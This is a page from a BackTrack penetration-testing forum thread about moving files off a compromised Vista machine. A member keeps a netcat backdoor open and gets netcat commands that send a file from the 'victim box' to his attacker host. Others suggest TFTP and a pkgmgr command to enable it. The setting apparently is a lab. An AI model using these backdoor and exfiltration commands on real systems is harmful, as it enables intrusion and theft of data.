Page 2 of 5 FirstFirst 1234 ... LastLast
Results 11 to 20 of 44

Thread: File transfer from vista to BT3

  1. #11
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by KMDave View Post
    If there is no tftp command anymore then use the meterpreter session to transfer files as mentioned above. Or you've gotta use nc to transfer files
    I don't want to use the meterpreter session any more (ideally i wouldn't be able to). Because, according to my plan, i have opened a backdoor by nc. Now, i'm connected via telnet and on the command shell. I'll give nc a go. cheers guys

  2. #12
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Quote Originally Posted by kazalku View Post
    should i open a new konsole in BT3 box to start tftp? Actually, i tried that and after connecting to vista box
    Code:
    tftp 192.168.1.2
    tried to transfer a file from bt3 to vista
    Code:
    put /root/test.txt 192.168.1.2
    showed me transfer timedout...
    Wrong way around.

    You should start the tftp server on BT3 and then if they would have tftp on Vista use it to put or get files to/from the BT3 box.

    Just open a command prompt on a XP machine and type tftp.
    Tiocfaidh ár lá

  3. #13
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by KMDave View Post
    Not ftp, tftp

    Just start the tftp server on the BT3 machine and you should be good to go then.
    Yeah i know the difference and was just stating the fact that ftp is installed in a default instance of xp.

    Upon further research tftp is available for vista, in order to access it it must be "turned on" according to windows access is through
    control pane>Programs and Features> Turn Windows features on and off.
    It will be listed TFTP Client.

    EDIT: see that hawaii67 beat me to the punch.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #14
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Thanks for the info about the tftp client. Mh either might want to check if it is possible to enable it via command line than somehow or use NC to transfer files. Will be a little bit more complicated but it will work.
    Tiocfaidh ár lá

  5. #15
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Quote Originally Posted by archangel.amael View Post

    EDIT: see that hawaii67 beat me to the punch.
    Sorry mate
    Don't eat yellow snow :rolleyes:

  6. #16
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by KMDave View Post
    Thanks for the info about the tftp client. Mh either might want to check if it is possible to enable it via command line than somehow or use NC to transfer files. Will be a little bit more complicated but it will work.
    Well like hawaii67 stated you have to have local admin access to the machine in order to get it to install. Seems to me that if one has admin rights on the machine then it is pretty much pwned.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #17
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Quote Originally Posted by KMDave View Post
    Mh either might want to check if it is possible to enable it via command line than somehow or use NC to transfer files. Will be a little bit more complicated but it will work.
    I didn't try it out but maybe this works:

    Code:
    start /w pkgmgr /iu:”TftpClient”
    Don't eat yellow snow :rolleyes:

  8. #18
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by Lincoln View Post
    Have you tried the download command in meterpreter
    Well, my plan is to open a backdoor in a compromised box and keep the backdoor open for future connection. I used meterpreter upload command to upload nc & psexec. But, after closing very first meterpreter session, I won't have meterpreter anymore. All I have is a command shell. Thanks anyway for the reply.
    I'll now try nc as suggested by KMDave.

  9. #19
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by KMDave View Post
    Thanks for the info about the tftp client. Mh either might want to check if it is possible to enable it via command line than somehow or use NC to transfer files. Will be a little bit more complicated but it will work.
    Thanks mate nc worked well for me, as you mentioned - it's a bit complicated, but serves the purpose. just for reference, I used this for receiving the file on BT3 konsole:
    Code:
    nc  -vv -l -p 10000 > xxxx.txt
    And on the command shell (to send the file from Vista Box):
    Code:
    nc 192.168.1.4 10000 < xxxx.txt
    xxxx.txt was in the same directory with nc.exe in the victim box and after receiving the file BT3 saves it under root directory.
    Thanks all for your contribution. It's nice to see some stars together

  10. #20
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Glad that you found out how it is working

    And glad that you looked into it by yourself. If you need to know more, let us know
    Tiocfaidh ár lá

Page 2 of 5 FirstFirst 1234 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •